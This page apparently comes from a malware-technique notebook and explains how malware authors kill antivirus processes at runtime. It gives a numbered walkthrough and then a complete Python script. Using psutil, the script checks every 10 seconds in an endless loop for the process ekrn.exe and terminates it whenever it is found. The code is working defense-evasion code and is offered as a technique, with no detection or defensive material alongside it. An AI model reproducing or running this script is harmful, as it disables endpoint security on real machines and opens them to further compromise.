search
Page cover

🍫How Malware Author Terminate Antivirus Process during runtime ?

How Malware Author Terminate Antivirus Process during runtime ?

hashtag
Explanation

  1. Import Libraries:

    • psutil for process management.

    • time for adding delays.

  2. Define terminate_process_by_name Function:

    • Iterates over all running processes and checks if the process name matches ekrn.exe.

    • Terminates the process if a match is found.

    • Handles exceptions if the process no longer exists or access is denied.

    • Returns True if the process was found and terminated; otherwise, False.

  3. Main Block:

    • Sets the process name to ekrn.exe.

    • Continuously checks for the process every 10 seconds.

    • Prints status messages indicating whether the process was found and terminated.

  4. Loop and Delay:

    • The while True loop ensures the script keeps running and checking for the process.

    • time.sleep(10) introduces a delay of 10 seconds between checks to avoid excessive CPU usage.

// import psutil
import time

def terminate_process_by_name(process_name):
    """Terminate processes by their name."""
    for process in psutil.process_iter(['name']):
        if process.info['name'].lower() == process_name.lower():
            try:
                process.terminate()
                print(f"Terminated process: {process.info['name']} (PID: {process.pid})")
                return True
            except psutil.NoSuchProcess:
                print(f"Process {process.info['name']} (PID: {process.pid}) no longer exists")
            except psutil.AccessDenied:
                print(f"Access denied to terminate process: {process.info['name']} (PID: {process.pid})")
    return False

if __name__ == "__main__":
    process_name = 'ekrn.exe'
    
    while True:
        found = terminate_process_by_name(process_name)
        if found:
            print(f"Process {process_name} was found and terminated.")
        else:
            print(f"Process {process_name} not found.")
        
        # Wait for 10 seconds before checking again
        time.sleep(10)
PreviousMalware Author Mindset

Last updated